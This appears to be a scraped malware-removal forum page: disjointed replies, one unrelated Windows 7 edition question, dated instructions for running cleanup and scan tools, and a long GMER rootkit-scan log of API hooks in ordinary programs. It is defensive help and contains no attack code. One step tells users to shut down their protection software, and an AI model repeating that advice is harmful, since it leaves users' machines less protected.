moved to malware
please post the log it made so we can see & hopefully advise you

Hi Mark! I am taking you at your word and seeking advice. Im trying to decide whether to purchase the
Windows 7 home premium 32 bit or the Professional.
I used the upgrade advisor and my system will support 7 so I figure it will support either one.
I'm just thinking that the professional would be a better fit for all my older programs that run with XP.
Am I right??????
Thanks for you expertise

Quite a lot going on with your system, do the following:

Run FRST one more time from the Recovery Environment:

Type the following in the edit box after "Search:". Or copy paste:

rpcss.dll;kernel32.dll

Click Search button and post the log (Search.txt) it makes to your reply.

Kevin

Welcome.

Download TFC by OldTimer to your desktop

• Please double-click TFC.exe to run it. (Note: If you are running on Vista, right-click on the file and choose Run As Administrator).
• It will close all programs when run, so make sure you have saved all your work before you begin.
• Click the Start button to begin the process. Depending on how often you clean temp files, execution time should be anywhere from a few seconds to a minute or two. Let it run uninterrupted to completion.
• Once it's finished it should reboot your machine. If it does not, please manually reboot the machine yourself to ensure a complete clean.

Please download Junkware Removal Tool to your desktop.

• Shut down your protection software now to avoid potential conflicts.
• Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
• The tool will open and start scanning your system.
• Please be patient as this can take a while to complete depending on your system's specifications.
• On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
• Post the contents of JRT.txt into your next message.

Download : ADWCleaner to your desktop.

NOTE: If using Internet Explorer and get an alert that stops the program downloading, click on the warning and allow the download to complete.

Close all programs and click on the AdwCleaner icon.



Click on Scan and follow the prompts. Let it run unhindered. When done, click on the Clean button, and follow the prompts. Allow the system to reboot. You will then be presented with the report. Copy & Paste this report on your next reply.

The report will be saved in the C:\AdwCleaner folder. as AdwCleaner[S0].txt

Please download Malwarebytes' Anti-Malware from Here.

Double Click mbam-setup.exe to install the application.

• Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
• If an update is found, it will download and install the latest version.
• Once the program has loaded, select "Perform Quick Scan", then click Scan.
• The scan may take some time to finish,so please be patient.
• When the scan is complete, click OK, then Show Results to view the results.
• Make sure that everything is checked, and click Remove Selected.
• When disinfection is completed, a log will open in Notepad and you may be prompted to Restart.(See Extra Note)
• The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.
• Copy&Paste the entire report in your next reply.

Extra Note:

If MBAM encounters a file that is difficult to remove,you will be presented with 1 of 2 prompts,click OK to either and let MBAM proceed with the disinfection process. If asked to restart the computer, please do so immediately.

Please download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

• Double-click to run it. When the tool opens click Yes to disclaimer.
• Make sure that under Optional Scans, there is a checkmark on Addition.txt and Shortcut.
• Press Scan button.
• It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
• The first time the tool is run, it makes also another two logs (Addition.txt and Shortcut.txt). Please attach these to your reply.

(the GMER scan was too long for one post, so this is the second portion of it)



C:\windows\syswow64\USER32.dll!EnumDisplayDevicesA 00000000761d4572 5 bytes JMP 000000016eb810c8
.text C:\Program Files (x86)\LOLReplay\LOLRecorder.exe[6396] C:\windows\syswow64\USER32.dll!EnumDisplayDevicesW 00000000761ee567 5 bytes JMP 000000016eb81433
.text C:\Program Files (x86)\LOLReplay\LOLRecorder.exe[6396] C:\windows\syswow64\USER32.dll!DisplayConfigGetDeviceInfo 0000000076227a5c 5 bytes JMP 000000016eb815f0
.text C:\Program Files (x86)\LOLReplay\LOLRecorder.exe[6396] C:\windows\syswow64\ole32.dll!CoSetProxyBlanket 0000000075fd5ea5 5 bytes JMP 000000016eb81618
.text C:\Program Files (x86)\LOLReplay\LOLRecorder.exe[6396] C:\windows\syswow64\ole32.dll!CoCreateInstance 0000000076009d0b 5 bytes JMP 000000016eb8123f
.text C:\Program Files (x86)\LOLReplay\LOLRecorder.exe[6396] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 69 0000000077bf1465 2 bytes [BF, 77]
.text C:\Program Files (x86)\LOLReplay\LOLRecorder.exe[6396] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 155 0000000077bf14bb 2 bytes [BF, 77]
.text ... * 2
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\KERNEL32.dll!RegQueryValueExW 0000000077261f0e 7 bytes JMP 000000016eb816b3
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\KERNEL32.dll!RegSetValueExW 0000000077265bad 7 bytes JMP 000000016eb811cc
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\KERNEL32.dll!RegSetValueExA 0000000077271409 7 bytes JMP 000000016eb812a8
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\KERNEL32.dll!RegDeleteValueW 000000007727ea45 7 bytes JMP 000000016eb81262
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\KERNEL32.dll!GetBinaryTypeW + 112 000000007728a2fd 1 byte [62]
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\KERNEL32.dll!K32GetModuleFileNameExW 000000007728b21b 5 bytes JMP 000000016eb815c8
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\KERNEL32.dll!K32EnumProcessModulesEx 0000000077308e24 7 bytes JMP 000000016eb81357
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\KERNEL32.dll!K32GetModuleInformation 0000000077308ea9 5 bytes JMP 000000016eb816f4
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\KERNEL32.dll!K32GetMappedFileNameW 00000000773091ff 5 bytes JMP 000000016eb8101e
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\KERNELBASE.dll!GetModuleHandleW 0000000075b91d1b 5 bytes JMP 000000016eb811e5
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\KERNELBASE.dll!GetModuleHandleExW 0000000075b91dc9 5 bytes JMP 000000016eb81019
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\KERNELBASE.dll!LoadLibraryExW 0000000075b92aa4 5 bytes JMP 000000016eb81573
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\KERNELBASE.dll!FreeLibrary 0000000075b92d0a 5 bytes JMP 000000016eb8128f
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\GDI32.dll!D3DKMTGetDisplayModeList 0000000075d9e96b 5 bytes JMP 000000016eb815e1
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\GDI32.dll!D3DKMTQueryAdapterInfo 0000000075d9eba5 5 bytes JMP 000000016eb811a9
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\USER32.dll!CreateWindowExW 00000000761c8a29 5 bytes JMP 000000016eb81046
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\USER32.dll!EnumDisplayDevicesA 00000000761d4572 5 bytes JMP 000000016eb810c8
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\USER32.dll!EnumDisplayDevicesW 00000000761ee567 5 bytes JMP 000000016eb81433
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\USER32.dll!DisplayConfigGetDeviceInfo 0000000076227a5c 5 bytes JMP 000000016eb815f0
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\ole32.dll!CoSetProxyBlanket 0000000075fd5ea5 5 bytes JMP 000000016eb81618
.text C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe[6432] C:\windows\syswow64\ole32.dll!CoCreateInstance 0000000076009d0b 5 bytes JMP 000000016eb8123f
.text C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe[6448] C:\windows\system32\kernel32.dll!RegSetValueExW 000000007771a400 7 bytes JMP 000000016fff0260
.text C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe[6448] C:\windows\system32\kernel32.dll!RegQueryValueExW 0000000077723f20 5 bytes JMP 000000016fff01b8
.text C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe[6448] C:\windows\system32\kernel32.dll!RegDeleteValueW 000000007773ffb0 5 bytes JMP 000000016fff01f0
.text C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe[6448] C:\windows\system32\kernel32.dll!K32GetMappedFileNameW 000000007774f2e0 5 bytes JMP 000000016fff0148
.text C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe[6448] C:\windows\system32\kernel32.dll!GetBinaryTypeW + 189 000000007776ef8d 1 byte [62]
.text C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe[6448] C:\windows\system32\kernel32.dll!K32EnumProcessModulesEx 0000000077779a30 7 bytes JMP 000000016fff00d8
.text C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe[6448] C:\windows\system32\kernel32.dll!K32GetModuleInformation 00000000777894c0 5 bytes JMP 000000016fff0180
.text C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe[6448] C:\windows\system32\kernel32.dll!K32GetModuleFileNameExW 0000000077789630 5 bytes JMP 000000016fff0110
.text C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe[6448] C:\windows\system32\kernel32.dll!RegSetValueExA 00000000777a87e0 7 bytes JMP 000000016fff0228
.text C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe[6448] C:\windows\system32\KERNELBASE.dll!FreeLibrary 000007fefe202db0 5 bytes JMP 000007fffe1d0180
.text C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe[6448] C:\windows\system32\KERNELBASE.dll!GetModuleHandleW 000007fefe2037d0 7 bytes JMP 000007fffe1d00d8
.text C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe[6448] C:\windows\system32\KERNELBASE.dll!LoadLibraryExW 000007fefe208ef0 6 bytes JMP 000007fffe1d0148
.text C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe[6448] C:\windows\system32\KERNELBASE.dll!GetModuleHandleExW 000007fefe21af60 5 bytes JMP 000007fffe1d0110
.text C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe[6448] C:\windows\system32\GDI32.dll!D3DKMTQueryAdapterInfo 000007fefe4489e0 8 bytes JMP 000007fffe1d01f0
.text C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe[6448] C:\windows\system32\GDI32.dll!D3DKMTGetDisplayModeList 000007fefe44be40 8 bytes JMP 000007fffe1d01b8
.text C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe[6448] C:\windows\system32\ole32.dll!CoCreateInstance 000007feff8e7490 11 bytes JMP 000007fffe1d0228
.text C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe[6448] C:\windows\system32\ole32.dll!CoSetProxyBlanket 000007feff8fbf00 7 bytes JMP 000007fffe1d0260
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\kernel32.dll!RegQueryValueExW 0000000077261f0e 7 bytes JMP 000000016eb816b3
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\kernel32.dll!RegSetValueExW 0000000077265bad 7 bytes JMP 000000016eb811cc
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\kernel32.dll!RegSetValueExA 0000000077271409 7 bytes JMP 000000016eb812a8
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\kernel32.dll!RegDeleteValueW 000000007727ea45 7 bytes JMP 000000016eb81262
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 000000007728a2fd 1 byte [62]
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\kernel32.dll!K32GetModuleFileNameExW 000000007728b21b 5 bytes JMP 000000016eb815c8
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\kernel32.dll!K32EnumProcessModulesEx 0000000077308e24 7 bytes JMP 000000016eb81357
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\kernel32.dll!K32GetModuleInformation 0000000077308ea9 5 bytes JMP 000000016eb816f4
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\kernel32.dll!K32GetMappedFileNameW 00000000773091ff 5 bytes JMP 000000016eb8101e
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\KERNELBASE.dll!GetModuleHandleW 0000000075b91d1b 5 bytes JMP 000000016eb811e5
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\KERNELBASE.dll!GetModuleHandleExW 0000000075b91dc9 5 bytes JMP 000000016eb81019
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\KERNELBASE.dll!LoadLibraryExW 0000000075b92aa4 5 bytes JMP 000000016eb81573
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\KERNELBASE.dll!FreeLibrary 0000000075b92d0a 5 bytes JMP 000000016eb8128f
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\GDI32.dll!D3DKMTGetDisplayModeList 0000000075d9e96b 5 bytes JMP 000000016eb815e1
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\GDI32.dll!D3DKMTQueryAdapterInfo 0000000075d9eba5 5 bytes JMP 000000016eb811a9
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\USER32.dll!CreateWindowExW 00000000761c8a29 5 bytes JMP 000000016eb81046
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\USER32.dll!EnumDisplayDevicesA 00000000761d4572 5 bytes JMP 000000016eb810c8
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\USER32.dll!EnumDisplayDevicesW 00000000761ee567 5 bytes JMP 000000016eb81433
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\USER32.dll!DisplayConfigGetDeviceInfo 0000000076227a5c 5 bytes JMP 000000016eb815f0
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\ole32.dll!CoSetProxyBlanket 0000000075fd5ea5 5 bytes JMP 000000016eb81618
.text C:\Program Files (x86)\iTunes\iTunesHelper.exe[6544] C:\windows\syswow64\ole32.dll!CoCreateInstance 0000000076009d0b 5 bytes JMP 000000016eb8123f
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\KERNEL32.dll!RegQueryValueExW 0000000077261f0e 7 bytes JMP 000000016eb816b3
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\KERNEL32.dll!RegSetValueExW 0000000077265bad 7 bytes JMP 000000016eb811cc
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\KERNEL32.dll!RegSetValueExA 0000000077271409 7 bytes JMP 000000016eb812a8
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\KERNEL32.dll!RegDeleteValueW 000000007727ea45 7 bytes JMP 000000016eb81262
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\KERNEL32.dll!GetBinaryTypeW + 112 000000007728a2fd 1 byte [62]
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\KERNEL32.dll!K32GetModuleFileNameExW 000000007728b21b 5 bytes JMP 000000016eb815c8
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\KERNEL32.dll!K32EnumProcessModulesEx 0000000077308e24 7 bytes JMP 000000016eb81357
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\KERNEL32.dll!K32GetModuleInformation 0000000077308ea9 5 bytes JMP 000000016eb816f4
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\KERNEL32.dll!K32GetMappedFileNameW 00000000773091ff 5 bytes JMP 000000016eb8101e
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\KERNELBASE.dll!GetModuleHandleW 0000000075b91d1b 5 bytes JMP 000000016eb811e5
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\KERNELBASE.dll!GetModuleHandleExW 0000000075b91dc9 5 bytes JMP 000000016eb81019
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\KERNELBASE.dll!LoadLibraryExW 0000000075b92aa4 5 bytes JMP 000000016eb81573
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\KERNELBASE.dll!FreeLibrary 0000000075b92d0a 5 bytes JMP 000000016eb8128f
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\GDI32.dll!D3DKMTGetDisplayModeList 0000000075d9e96b 5 bytes JMP 000000016eb815e1
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\GDI32.dll!D3DKMTQueryAdapterInfo 0000000075d9eba5 5 bytes JMP 000000016eb811a9
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\USER32.dll!CreateWindowExW 00000000761c8a29 5 bytes JMP 000000016eb81046
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\USER32.dll!EnumDisplayDevicesA 00000000761d4572 5 bytes JMP 000000016eb810c8
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\USER32.dll!EnumDisplayDevicesW 00000000761ee567 5 bytes JMP 000000016eb81433
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\USER32.dll!DisplayConfigGetDeviceInfo 0000000076227a5c 5 bytes JMP 000000016eb815f0
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\ole32.dll!CoSetProxyBlanket 0000000075fd5ea5 5 bytes JMP 000000016eb81618
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\ole32.dll!CoCreateInstance 0000000076009d0b 5 bytes JMP 000000016eb8123f
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 69 0000000077bf1465 2 bytes [BF, 77]
.text C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe[6712] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 155 0000000077bf14bb 2 bytes [BF, 77]
.text ... * 2
.text C:\Program Files\AVAST Software\Avast\AvastUI.exe[6844] C:\windows\syswow64\kernel32.dll!SetUnhandledExceptionFilter 0000000077268791 8 bytes [31, C0, C2, 04, 00, 90, 90, ...]
.text C:\Program Files\AVAST Software\Avast\AvastUI.exe[6844] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 000000007728a2fd 1 byte [62]
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\kernel32.dll!RegQueryValueExW 0000000077261f0e 7 bytes JMP 000000016eb816b3
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\kernel32.dll!RegSetValueExW 0000000077265bad 7 bytes JMP 000000016eb811cc
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\kernel32.dll!RegSetValueExA 0000000077271409 7 bytes JMP 000000016eb812a8
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\kernel32.dll!RegDeleteValueW 000000007727ea45 7 bytes JMP 000000016eb81262
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 000000007728a2fd 1 byte [62]
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\kernel32.dll!K32GetModuleFileNameExW 000000007728b21b 5 bytes JMP 000000016eb815c8
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\kernel32.dll!K32EnumProcessModulesEx 0000000077308e24 7 bytes JMP 000000016eb81357
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\kernel32.dll!K32GetModuleInformation 0000000077308ea9 5 bytes JMP 000000016eb816f4
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\kernel32.dll!K32GetMappedFileNameW 00000000773091ff 5 bytes JMP 000000016eb8101e
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\KERNELBASE.dll!GetModuleHandleW 0000000075b91d1b 5 bytes JMP 000000016eb811e5
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\KERNELBASE.dll!GetModuleHandleExW 0000000075b91dc9 5 bytes JMP 000000016eb81019
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\KERNELBASE.dll!LoadLibraryExW 0000000075b92aa4 5 bytes JMP 000000016eb81573
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\KERNELBASE.dll!FreeLibrary 0000000075b92d0a 5 bytes JMP 000000016eb8128f
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 69 0000000077bf1465 2 bytes [BF, 77]
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\PSAPI.DLL!GetModuleInformation + 155 0000000077bf14bb 2 bytes [BF, 77]
.text ... * 2
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\USER32.dll!CreateWindowExW 00000000761c8a29 5 bytes JMP 000000016eb81046
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\USER32.dll!EnumDisplayDevicesA 00000000761d4572 5 bytes JMP 000000016eb810c8
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\USER32.dll!EnumDisplayDevicesW 00000000761ee567 5 bytes JMP 000000016eb81433
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\USER32.dll!DisplayConfigGetDeviceInfo 0000000076227a5c 5 bytes JMP 000000016eb815f0
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\GDI32.dll!D3DKMTGetDisplayModeList 0000000075d9e96b 5 bytes JMP 000000016eb815e1
.text C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe[7064] C:\windows\syswow64\GDI32.dll!D3DKMTQueryAdapterInfo 0000000075d9eba5 5 bytes JMP 000000016eb811a9
.text C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe[7076] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 000000007728a2fd 1 byte [62]
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\kernel32.dll!RegQueryValueExW 0000000077261f0e 7 bytes JMP 000000016eb816b3
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\kernel32.dll!RegSetValueExW 0000000077265bad 7 bytes JMP 000000016eb811cc
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\kernel32.dll!RegSetValueExA 0000000077271409 7 bytes JMP 000000016eb812a8
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\kernel32.dll!RegDeleteValueW 000000007727ea45 7 bytes JMP 000000016eb81262
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 000000007728a2fd 1 byte [62]
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\kernel32.dll!K32GetModuleFileNameExW 000000007728b21b 5 bytes JMP 000000016eb815c8
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\kernel32.dll!K32EnumProcessModulesEx 0000000077308e24 7 bytes JMP 000000016eb81357
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\kernel32.dll!K32GetModuleInformation 0000000077308ea9 5 bytes JMP 000000016eb816f4
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\kernel32.dll!K32GetMappedFileNameW 00000000773091ff 5 bytes JMP 000000016eb8101e
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\KERNELBASE.dll!GetModuleHandleW 0000000075b91d1b 5 bytes JMP 000000016eb811e5
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\KERNELBASE.dll!GetModuleHandleExW 0000000075b91dc9 5 bytes JMP 000000016eb81019
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\KERNELBASE.dll!LoadLibraryExW 0000000075b92aa4 5 bytes JMP 000000016eb81573
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\KERNELBASE.dll!FreeLibrary 0000000075b92d0a 5 bytes JMP 000000016eb8128f
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\GDI32.dll!D3DKMTGetDisplayModeList 0000000075d9e96b 5 bytes JMP 000000016eb815e1
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\GDI32.dll!D3DKMTQueryAdapterInfo 0000000075d9eba5 5 bytes JMP 000000016eb811a9
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\USER32.dll!CreateWindowExW 00000000761c8a29 5 bytes JMP 000000016eb81046
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\USER32.dll!EnumDisplayDevicesA 00000000761d4572 5 bytes JMP 000000016eb810c8
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\USER32.dll!EnumDisplayDevicesW 00000000761ee567 5 bytes JMP 000000016eb81433
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\USER32.dll!DisplayConfigGetDeviceInfo 0000000076227a5c 5 bytes JMP 000000016eb815f0
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\ole32.dll!CoSetProxyBlanket 0000000075fd5ea5 5 bytes JMP 000000016eb81618
.text C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe[6272] C:\windows\syswow64\ole32.dll!CoCreateInstance 0000000076009d0b 5 bytes JMP 000000016eb8123f
.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\KERNEL32.dll!RegQueryValueExW 0000000077261f0e 7 bytes JMP 000000016eb816b3
.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\KERNEL32.dll!RegSetValueExW 0000000077265bad 7 bytes JMP 000000016eb811cc
.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\KERNEL32.dll!RegSetValueExA 0000000077271409 7 bytes JMP 000000016eb812a8
.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\KERNEL32.dll!RegDeleteValueW 000000007727ea45 7 bytes JMP 000000016eb81262
